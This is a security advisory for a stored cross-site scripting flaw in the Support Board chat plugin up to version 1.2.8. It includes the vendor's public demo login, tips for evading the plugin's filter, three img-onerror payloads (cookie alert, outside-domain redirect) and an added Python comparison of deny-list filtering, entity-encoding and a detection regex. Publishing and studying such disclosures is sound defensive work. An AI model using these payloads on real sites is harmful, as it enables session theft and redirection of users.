Support Board - Chat And Help Desk | Support & Chat <= 1.2.8 Stored XSS



Description
Info:
Weak security measures, such as poor filtering of textarea data, have been discovered in «Support Board - Chat And Help Desk | Support & Chat».

Demo Website:
https://codecanyon.net/item/support-board-chat-and-help-desk/20752085
Backend: https://board.support/desk-demo/?login=true
Login / Password: demo@board.support / demo

Timeline (WPScan Team):
June 11th - Issue submitted to Envato
June 17th - Envato Support confirmed they are investigating the issue
June 17th - New version released with Fix (1.2.9)
Proof of Concept
Don't use double quotes inside your payload - they'll be filtered. Avoid using a specific protocol scheme such as http: or https: - your payload will be broken.

Go to the demo website https://board.support/desk-demo/?login=true and log in with the provided credentials (demo@board.support / demo). The most stable and useful attack vector is the <img> tag with your payload inside; see the examples below.

Example #1: <img src=x onerror=alert(document.cookie)>
Example #2: <img src=x onerror=alert('m0ze');window.open('//m0ze.ru/')>
Example #3: <img src=x onerror=alert('m0ze');window.location='//m0ze.ru/'>
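As an added illustration (not code from the advisory or from the plugin), the Python below contrasts a deny-list filter modelled on the behaviour described above (assumed, since the plugin's source is not shown here, to strip only double quotes and http:/https: schemes) with plain entity-encoding, and includes a simple check a defender can run over stored ticket text to flag inline event handlers that survived filtering.

```python
import html
import re

# Payloads from the advisory's proof of concept, used here as test input.
POC_PAYLOADS = [
    "<img src=x onerror=alert(document.cookie)>",
    "<img src=x onerror=alert('m0ze');window.open('//m0ze.ru/')>",
]


def weak_filter(text: str) -> str:
    """Deny-list filter modelled on the advisory's description.
    Assumption: it removes double quotes and http:/https: schemes and
    nothing else; the plugin's real code is not reproduced here."""
    text = text.replace('"', "")
    return re.sub(r"https?:", "", text, flags=re.IGNORECASE)


def safe_encode(text: str) -> str:
    """Output encoding: treat ticket text as data and entity-encode every
    HTML metacharacter, so no markup it contains can be parsed as a tag."""
    return html.escape(text, quote=True)


# Matches a tag that still carries an inline on*= event handler attribute.
EVENT_HANDLER = re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_inline_handler(rendered: str) -> bool:
    """Detection helper for stored content: True if the string, as it would
    reach the browser, contains a tag with an inline event handler."""
    return bool(EVENT_HANDLER.search(rendered))


def compare(payload: str) -> dict:
    """Run one payload through both approaches and report whether the
    result would still be executable in a browser."""
    weak = weak_filter(payload)
    safe = safe_encode(payload)
    return {
        "weak_output": weak,
        "weak_still_executable": contains_inline_handler(weak),
        "safe_output": safe,
        "safe_still_executable": contains_inline_handler(safe),
    }


if __name__ == "__main__":
    for payload in POC_PAYLOADS:
        print(compare(payload))
```

Note that stripping double quotes does not even break a quoted payload: HTML accepts unquoted attribute values, so `<img src="x" onerror="alert(1)">` collapses to exactly the form the advisory uses.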

Affects Plugin

fixed in version 1.2.9

References

URL https://codecanyon.net/item/support-board-chat-and-help-desk/20752085

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 1312
Verified Yes
WPVDB ID 9351

Timeline

Publicly Published 2019-06-11 (about 1 month ago)
Added 2019-06-18 (about 1 month ago)
Last Updated 2019-06-23 (30 days ago)
